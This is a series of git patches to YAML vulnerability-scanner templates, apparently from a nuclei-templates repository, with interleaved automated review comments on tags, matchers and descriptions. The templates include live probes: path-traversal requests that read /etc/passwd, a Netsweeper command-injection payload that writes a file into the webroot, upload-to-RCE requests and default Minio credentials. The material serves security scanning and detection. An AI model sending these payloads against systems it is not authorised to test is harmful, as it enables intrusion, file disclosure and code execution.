From 9169fe37055a9c222c8115abecaa2cb7e0502b6a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:31:44 +0530 Subject: [PATCH 112/339] Update and rename confluence-detector.yaml to confluence-detect.yaml --- ...nfluence-detector.yaml => confluence-detect.yaml} | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename technologies/{confluence-detector.yaml => confluence-detect.yaml} (82%) diff --git a/technologies/confluence-detector.yaml b/technologies/confluence-detect.yaml similarity index 82% rename from technologies/confluence-detector.yaml rename to technologies/confluence-detect.yaml index a418291693..168a3b1f53 100644 --- a/technologies/confluence-detector.yaml +++ b/technologies/confluence-detect.yaml @@ -1,11 +1,11 @@ -id: confluence-detector +id: confluence-detect info: - name: confluence detector - author: philippedelteil + name: Confluence Detect + author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - tags: confluence + tags: tech,confluence requests: - method: GET @@ -17,8 +17,7 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: or - + matchers-condition: and matchers: - type: word words: @@ -31,6 +30,7 @@ requests: words: - 'confluence-base-url' part: body + extractors: - type: regex part: body From 43b45a7b631b41ad4a3e0d5617ce0593d79db057 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:42:52 +0530 Subject: [PATCH 113/339] Update CVE-2020-12720.yaml --- cves/2020/CVE-2020-12720.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml index 092f2de376..289db507b6 100644 --- a/cves/2020/CVE-2020-12720.yaml +++ b/cves/2020/CVE-2020-12720.yaml @@ -13,6 +13,7 @@ requests: - | POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: application/x-www-form-urlencoded 
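Review bot: Changing `matchers-condition: or` to `and` means a response must carry both a `-Confluence-` response header and `confluence-base-url` in the body, and with `stop-at-first-match: true` over four paths an instance behind a reverse proxy that strips `X-Confluence-*` headers, or one whose first matching path is a login redirect without the meta tag, is now missed entirely. If the goal is to cut false positives, say so in a comment and keep the version extractor as a third signal; otherwise `or` is the safer choice for a detection template. Note the header matcher already needs its own `condition: or` to accept either capitalisation.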
From 90eba9d88358fd387c564fe1b2cddd0ff729c860 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 11:46:54 +0530 Subject: [PATCH 114/339] Update CVE-2020-7961.yaml --- cves/2020/CVE-2020-7961.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index d88be8f1b8..9f314f0f40 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -7,6 +7,7 @@ info: tags: cve,cve2020,rce,liferay description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS). reference: + - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 @@ -43,4 +44,4 @@ requests: part: body regex: - "Microsoft Windows (.*)" - - "Distributor ID: (.*)" \ No newline at end of file + - "Distributor ID: (.*)" From 1f0b584bc8dda34f21261aa9314a27b0a744d099 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:03:47 +0530 Subject: [PATCH 115/339] Update flir-ax8-default-credentials.yaml --- default-logins/flir/flir-ax8-default-credentials.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/default-logins/flir/flir-ax8-default-credentials.yaml b/default-logins/flir/flir-ax8-default-credentials.yaml index 20db518552..3f011e9350 100644 --- a/default-logins/flir/flir-ax8-default-credentials.yaml +++ b/default-logins/flir/flir-ax8-default-credentials.yaml @@ -4,7 +4,7 @@ info: name: Flir Default Credentials author: pikpikcu severity: medium - tags: default-login,flir + tags: default-login,flir,camera,iot requests: - raw: @@ -33,4 +33,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 
From 08dac5638513f39d39dc26b468da8642d3be96e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:06:24 +0530 Subject: [PATCH 116/339] Update simple-employee-rce.yaml --- vulnerabilities/other/simple-employee-rce.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index b9fc3b354d..f965f9f0b6 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/49596 - tags: rce + tags: rce,intrusive requests: - raw: @@ -13,6 +13,7 @@ requests: POST /dashboard/uploadID.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 + X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 -----------------------------5825462663702204104870787337 From 576499034d0a871894b555320fb7d06c18d65831 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 12:09:13 +0530 Subject: [PATCH 117/339] Update wordpress-rce-simplefilelist.yaml --- vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml index eec6c6f958..60be402e20 100644 --- a/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml +++ b/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml 
@@ -7,7 +7,7 @@ info: reference: https://wpscan.com/vulnerability/10192 description: | The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - tags: wordpress,wp-plugin,rce + tags: wordpress,wp-plugin,rce,intrusive requests: - raw: @@ -43,6 +43,7 @@ requests: - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: application/x-www-form-urlencoded From 732f5e95ac9766c48d6b8d9f2cca0bba1050235d Mon Sep 17 00:00:00 2001 From: lu4nx Date: Thu, 9 Sep 2021 16:14:08 +0800 Subject: [PATCH 118/339] Add: TiDB Native password bruteforce check plugin --- network/tidb-native-cred-bruteforce.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 network/tidb-native-cred-bruteforce.yaml diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-cred-bruteforce.yaml new file mode 100644 index 0000000000..6344da325e --- /dev/null +++ b/network/tidb-native-cred-bruteforce.yaml @@ -0,0 +1,19 @@ +id: tidb-native-password-bruteforce + +info: + name: TiDB DB with enabled native password + author: lu4nx + severity: info + tags: network,tidb,bruteforce,database + description: TiDB is fully compatible with the MySQL 5.7 protocol and the common features and syntax of MySQL 5.7. TiDB instance with enabled native password support prone vulnerable for password brute-force attack. + +network: + - host: + - "{{Hostname}}" + - "{{Hostname}}:4000" + + matchers: + - type: word + words: + - "mysql_native_password" + - "TiDB" From 6e98cbf67eef1bf528e336604fee59966be6e1be Mon Sep 17 00:00:00 2001 
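Review bot: The description in the first hunk documents the exploit-db Python script ("The Python exploit first uploads ...") rather than this template, and now that `intrusive` is tagged it should say what the template itself leaves behind. Suggest replacing the second sentence with `The template uploads a file containing PHP code with a .png extension, then sends a second request to rename it to .php; the renamed PHP file presumably remains on the target.` The raw request in the second hunk continues past the hunk, so the exact upload path and filename are not visible here.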
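Review bot: The two `words` entries sit under the word matcher's default `or` condition, so any plain MySQL server that advertises `mysql_native_password` in its handshake will match a template named after TiDB; add `condition: and` under `words:` so both `TiDB` and `mysql_native_password` must be present. The `id` (`tidb-native-password-bruteforce`) also does not match the filename (`tidb-native-cred-bruteforce.yaml`), and the `bruteforce` tag and description overstate what the template does — it only reads the banner and never attempts a login, so wording like `TiDB native password authentication enabled` is more accurate. The description grammar needs fixing too: `TiDB instances with native password authentication enabled may be exposed to password brute-force attacks.`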
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 16:18:16 +0700 Subject: [PATCH 119/339] Create CVE-2010-1308.yaml --- cves/2010/CVE-2010-1308.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1308.yaml diff --git a/cves/2010/CVE-2010-1308.yaml b/cves/2010/CVE-2010-1308.yaml new file mode 100644 index 0000000000..991bc53f66 --- /dev/null +++ b/cves/2010/CVE-2010-1308.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1308 + +info: + name: Joomla! Component SVMap 1.1.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12066 + - https://www.cvedetails.com/cve/CVE-2010-1308 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 6ce33e2f47bbf7306b59de1e8b0a926b9172b90a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 9 Sep 2021 15:01:35 +0530 Subject: [PATCH 120/339] Rename phpwiki-lfi.yaml to vulnerabilities/other/phpwiki-lfi.yaml --- phpwiki-lfi.yaml => vulnerabilities/other/phpwiki-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename phpwiki-lfi.yaml => vulnerabilities/other/phpwiki-lfi.yaml (100%) diff --git a/phpwiki-lfi.yaml b/vulnerabilities/other/phpwiki-lfi.yaml similarity index 100% rename from phpwiki-lfi.yaml rename to vulnerabilities/other/phpwiki-lfi.yaml From 02e6ccfd7e27e31c232593a5a939f7623f90f7b3 Mon Sep 17 00:00:00 2001 
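Review bot: The single path relies on `%00` null-byte truncation to cut off whatever the component appends to `controller`, so a target whose PHP build rejects embedded nulls returns nothing even if the parameter is still unsanitised; state this in the description (`The payload depends on null-byte truncation and will not fire on PHP builds that reject %00.`) so a miss is not read as not-vulnerable. The regex matcher has no `part:`, which defaults to the body, so the `root:.*:0:0` check is fine as written.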
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 9 Sep 2021 19:48:08 +0700 Subject: [PATCH 121/339] Create CVE-2018-15535.yaml --- cves/2018/CVE-2018-15535.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-15535.yaml diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml new file mode 100644 index 0000000000..5c53de530e --- /dev/null +++ b/cves/2018/CVE-2018-15535.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-15535 + +info: + name: Responsive FileManager < 9.13.4 - Directory Traversal + author: daffainfo + severity: high + description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. + reference: + - https://www.exploit-db.com/exploits/45271 + - https://www.cvedetails.com/cve/CVE-2018-15535 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From bd24dc198e0988824f27886147c55cf1ca949c08 Mon Sep 17 00:00:00 2001 
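Review bot: The description wording `does not properly neutralize get_file sequences such as ".."` is garbled — `get_file` is the value of the `action` parameter in the request, not a kind of sequence. Suggest `does not properly neutralize ".." sequences in the file parameter of the get_file action, allowing directory traversal outside the restricted directory.` The traversal depth is fixed at four `../` with no alternative paths, which is fine as a first probe but may miss deployments nested at a different depth.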
From: sandeep Date: Thu, 9 Sep 2021 19:08:13 +0530 Subject: [PATCH 122/339] Coverage for all templates using tags --- cves/2020/CVE-2020-12800.yaml | 1 + cves/2020/CVE-2020-13167.yaml | 4 +++- cves/2021/CVE-2021-3377.yaml | 1 + default-logins/minio/minio-default-password.yaml | 12 ++++++++---- .../prometheus-exposed-panel.yaml | 6 ++++-- exposures/configs/yii-debugger.yaml | 6 +++++- exposures/tokens/generic/shoppable-token.yaml | 1 + misconfiguration/front-page-misconfig.yaml | 1 + technologies/artica-web-proxy-detect.yaml | 4 ++++ technologies/basic-auth-detection.yaml | 1 + technologies/bigip-config-utility-detect.yaml | 1 + technologies/burp-api-detect.yaml | 1 + technologies/cacti-detect.yaml | 1 + technologies/clockwork-php-page.yaml | 2 ++ technologies/cockpit-detect.yaml | 1 + technologies/dell/dell-idrac6-detect.yaml | 2 ++ technologies/dell/dell-idrac7-detect.yaml | 2 ++ technologies/dell/dell-idrac8-detect.yaml | 2 ++ technologies/dell/dell-idrac9-detect.yaml | 2 ++ technologies/favicon-detection.yaml | 1 + technologies/firebase-detect.yaml | 2 ++ technologies/google-storage.yaml | 1 + technologies/graphql-detect.yaml | 1 + technologies/graylog-api-browser.yaml | 1 + technologies/gunicorn-detect.yaml | 4 +++- technologies/harbor-detect.yaml | 2 ++ technologies/home-assistant.yaml | 1 + technologies/ilo-detect.yaml | 1 + technologies/jaspersoft-detect.yaml | 1 + technologies/jellyfin-detect.yaml | 4 ++++ technologies/jolokia.yaml | 3 +++ technologies/kibana-detect.yaml | 1 + technologies/kong-detect.yaml | 1 + technologies/liferay-portal-detect.yaml | 2 ++ technologies/linkerd-badrule-detect.yaml | 8 ++------ technologies/lotus-domino-version.yaml | 2 ++ technologies/metabase-detect.yaml | 4 ++++ technologies/mrtg-detect.yaml | 2 ++ technologies/netsweeper-webadmin-detect.yaml | 1 + technologies/nginx-version.yaml | 3 +++ technologies/nifi-detech.yaml | 3 +++ technologies/oidc-detect.yaml | 2 ++ technologies/openam-detection.yaml | 1 + 
technologies/pi-hole-detect.yaml | 3 +++ technologies/prtg-detect.yaml | 2 ++ technologies/redmine-cli-detect.yaml | 1 + technologies/s3-detect.yaml | 1 + technologies/shiro-detect.yaml | 6 +++++- technologies/springboot-actuator.yaml | 4 ++++ technologies/sql-server-reporting.yaml | 1 + technologies/telerik-fileupload-detect.yaml | 2 ++ technologies/terraform-detect.yaml | 2 ++ technologies/tomcat-detect.yaml | 8 +++++--- technologies/tor-socks-proxy.yaml | 2 ++ technologies/weblogic-detect.yaml | 1 + technologies/werkzeug-debugger-detect.yaml | 1 + vulnerabilities/lsoft/listserv_maestro_rce.yaml | 1 + .../other/cacti-weathermap-file-write.yaml | 1 + .../other/caucho-resin-info-disclosure.yaml | 1 + vulnerabilities/other/pmb-local-file-disclosure.yaml | 1 + vulnerabilities/other/vpms-auth-bypass.yaml | 2 +- vulnerabilities/other/zms-auth-bypass.yaml | 1 + 62 files changed, 124 insertions(+), 20 deletions(-) rename {technologies => exposed-panels}/prometheus-exposed-panel.yaml (65%) diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml index 4a4a96bb69..8216d0e966 100644 --- a/cves/2020/CVE-2020-12800.yaml +++ b/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,7 @@ info: severity: critical description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. reference: https://github.com/amartinsec/CVE-2020-12800 + tags: cve,cve2020,wordpress,wp-plugin requests: - raw: diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index ffe6eb67a4..961d153f44 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml 
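Review bot: The new tags line omits `rce` and `intrusive` even though the description two lines above says the plugin allows unrestricted file upload and remote code execution, and patches 116/117 in this series tag comparable upload-to-RCE templates `rce,intrusive`; suggest `tags: cve,cve2020,wordpress,wp-plugin,rce,intrusive`. The raw request that performs the upload is outside the hunk, so whether a file is left behind is inferred from the description.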
@@ -9,13 +9,15 @@ info: reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says + additional-fields: + hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' requests: - method: GET path: - # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" + headers: Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 77ded129f4..1b44686e3e 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -8,6 +8,7 @@ info: - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 author: geeknik severity: medium + tags: cve,cve2021,xss,npm requests: - raw: diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml index 7d2b90fde6..12c46a6efe 100644 --- a/default-logins/minio/minio-default-password.yaml +++ b/default-logins/minio/minio-default-password.yaml 
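Review bot: The first path writes a file into the target's webroot (the decoded payload now recorded as `hex-payload` ends in `> /usr/local/netsweeper/webadmin/out`), yet the template carries no `intrusive` tag, unlike the file-writing templates tagged in patches 116/117 of this series; the `tags:` line sits above the hunk and should gain `intrusive`. `additional-fields` is also not a documented `info` key as far as I can tell — if the template loader is strict the file will fail to parse, so keeping the decoded payload as a YAML comment beside the path (as before) or folding it into `description:` is safer; please verify against the template schema.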
@@ -4,23 +4,27 @@ info: name: Minio Default Password author: pikpikcu severity: medium + tags: default-login,minio requests: - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}' - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}' + matchers-condition: and matchers: diff --git a/technologies/prometheus-exposed-panel.yaml b/exposed-panels/prometheus-exposed-panel.yaml similarity index 65% rename from technologies/prometheus-exposed-panel.yaml rename to exposed-panels/prometheus-exposed-panel.yaml index b107509968..2cda5cc379 100644 --- a/technologies/prometheus-exposed-panel.yaml +++ b/exposed-panels/prometheus-exposed-panel.yaml @@ -1,9 +1,11 @@ id: prometheus-exposed-panel + info: name: Prometheus.io exposed panel author: organiccrap severity: low - # usually runs on port http/9090 + tags: panel,prometheus + requests: - method: GET path: @@ -12,4 +14,4 @@ requests: matchers: - type: word words: - - Prometheus Time Series Collection and Processing Server + - 'Prometheus Time Series Collection and Processing Server' \ No newline at end of file diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml index 11232d47b1..e93bfbf58e 100644 --- a/exposures/configs/yii-debugger.yaml +++ b/exposures/configs/yii-debugger.yaml 
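Review bot: The removed comment `# usually runs on port http/9090` carried useful targeting information and is dropped rather than moved; keep it as `description: Prometheus web UI exposed without authentication; usually served on port 9090.` under `severity:`. The second hunk also strips the file's trailing newline (`\ No newline at end of file` on the `+` side), the opposite of what patches 114/115 in this series do — restore it.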
@@ -4,7 +4,8 @@ info: name: View Yii Debugger Information author: geeknik reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ - severity: info + severity: low + tags: yii,debug,exposure requests: - method: GET @@ -16,11 +17,14 @@ requests: - "{{BaseURL}}/sapi/debug/default/view" redirects: true + max-redirects: 2 + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Yii Debugger" diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml index 0f68803be2..0c3d4080a0 100644 --- a/exposures/tokens/generic/shoppable-token.yaml +++ b/exposures/tokens/generic/shoppable-token.yaml @@ -5,6 +5,7 @@ info: author: philippedelteil severity: info reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token requests: - method: GET diff --git a/misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml index 7e982772b0..8d49471b46 100644 --- a/misconfiguration/front-page-misconfig.yaml +++ b/misconfiguration/front-page-misconfig.yaml @@ -5,6 +5,7 @@ info: author: JTeles,pikpikcu severity: info reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications + tags: misconfig,exposure,frontpage requests: - method: GET diff --git a/technologies/artica-web-proxy-detect.yaml b/technologies/artica-web-proxy-detect.yaml index 82b19cfb2d..8fd487f5ee 100644 --- a/technologies/artica-web-proxy-detect.yaml +++ b/technologies/artica-web-proxy-detect.yaml @@ -1,18 +1,22 @@ id: artica-web-proxy-detect + info: name: Artica Web Proxy Detect author: dwisiswant0 severity: info + tags: tech,artica,proxy requests: - method: GET path: - "{{BaseURL}}/fw.login.php" + matchers-condition: and matchers: - type: word words: - "Welcome to the Artica Web Administration Interface" + - type: status status: - 200 \ No newline at end of file 
diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml index 66132d212e..894c3892d0 100644 --- a/technologies/basic-auth-detection.yaml +++ b/technologies/basic-auth-detection.yaml @@ -4,6 +4,7 @@ info: name: Basic auth detection author: w4cky_ severity: info + tags: tech,basic-auth requests: - method: GET diff --git a/technologies/bigip-config-utility-detect.yaml b/technologies/bigip-config-utility-detect.yaml index 4d3c250775..78b2741369 100644 --- a/technologies/bigip-config-utility-detect.yaml +++ b/technologies/bigip-config-utility-detect.yaml @@ -4,6 +4,7 @@ info: name: BIG-IP Configuration Utility detected author: dwisiswant0 severity: info + tags: tech,bigip requests: - method: GET diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index 68a7000ee7..10cc8bcac8 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -5,6 +5,7 @@ info: author: joanbono severity: info reference: https://portswigger.net/burp/documentation/enterprise/api-reference + tags: burp,tech requests: - method: GET diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index 0a2a721928..9d1d018f12 100644 --- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: Cacti is a complete network graphing solution -- https://www.cacti.net/ severity: info + tags: tech,cacti requests: - method: GET diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index 89ef10ba1b..a8537a2f36 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -1,9 +1,11 @@ id: clockwork-php-page + info: name: Clockwork PHP page exposure author: organiccrap severity: high reference: https://twitter.com/damian_89_/status/1250721398747791360 + tags: tech,clockwork requests: - method: GET 
diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml index 30bf745acc..81dd323dc8 100644 --- a/technologies/cockpit-detect.yaml +++ b/technologies/cockpit-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Agentejo Cockpit author: dwisiswant0 severity: info + tags: tech,cockpit requests: - method: GET diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml index 9d8bb598ff..6f3c118b88 100644 --- a/technologies/dell/dell-idrac6-detect.yaml +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac6-detect + info: name: Detect Dell iDRAC6 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml index bddc00552b..220cfc4503 100644 --- a/technologies/dell/dell-idrac7-detect.yaml +++ b/technologies/dell/dell-idrac7-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac7-detect + info: name: Detect Dell iDRAC7 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml index e25dc371e6..2fd72b97aa 100644 --- a/technologies/dell/dell-idrac8-detect.yaml +++ b/technologies/dell/dell-idrac8-detect.yaml 
@@ -1,9 +1,11 @@ id: dell-idrac8-detect + info: name: Detect Dell iDRAC8 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml index 7677292de5..f339b04905 100644 --- a/technologies/dell/dell-idrac9-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac9-detect + info: name: Detect Dell iDRAC9 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 7394c9fff3..3cf1e620d8 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -10,6 +10,7 @@ info: - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - https://github.com/devanshbatham/FavFreak - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + tags: tech,favicon requests: - method: GET diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml index fe3ff98b30..5c22ef8819 100644 --- a/technologies/firebase-detect.yaml +++ b/technologies/firebase-detect.yaml @@ -5,11 +5,13 @@ info: author: organiccrap severity: low reference: http://ghostlulz.com/google-exposed-firebase-database/ + tags: tech,firebase requests: - method: GET path: - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" + matchers: - type: word words: 
diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml index 27f4814a5b..95963c6a8c 100644 --- a/technologies/google-storage.yaml +++ b/technologies/google-storage.yaml @@ -4,6 +4,7 @@ info: name: Google Bucket detection author: 0xTeles severity: info + tags: tech,gstorage,google,bucket requests: - method: GET diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index ef649b7d06..53d67b1326 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -4,6 +4,7 @@ info: name: GraphQL API Detection author: NkxxkN,ELSFA7110 severity: info + tags: tech,graphql requests: - method: POST diff --git a/technologies/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml index 6c93a114fa..98799a87c0 100644 --- a/technologies/graylog-api-browser.yaml +++ b/technologies/graylog-api-browser.yaml @@ -4,6 +4,7 @@ info: name: Detect Graylog REST API author: PR3R00T severity: info + tags: tech,graylog requests: - method: GET diff --git a/technologies/gunicorn-detect.yaml b/technologies/gunicorn-detect.yaml index 69f286e77b..56f5080384 100644 --- a/technologies/gunicorn-detect.yaml +++ b/technologies/gunicorn-detect.yaml @@ -1,9 +1,11 @@ id: gunicorn-detect + info: name: Detect Gunicorn Server author: joanbono description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn severity: info + tags: tech,gunicorn requests: - method: GET @@ -22,4 +24,4 @@ requests: - type: kval part: header kval: - - Server + - Server \ No newline at end of file diff --git a/technologies/harbor-detect.yaml b/technologies/harbor-detect.yaml index e082b48acf..1ede65a8df 100644 --- a/technologies/harbor-detect.yaml +++ b/technologies/harbor-detect.yaml @@ -1,8 +1,10 @@ id: harbor-detect + info: name: Harbor Detect author: pikpikcu severity: info + tags: tech,harbor requests: - method: GET 
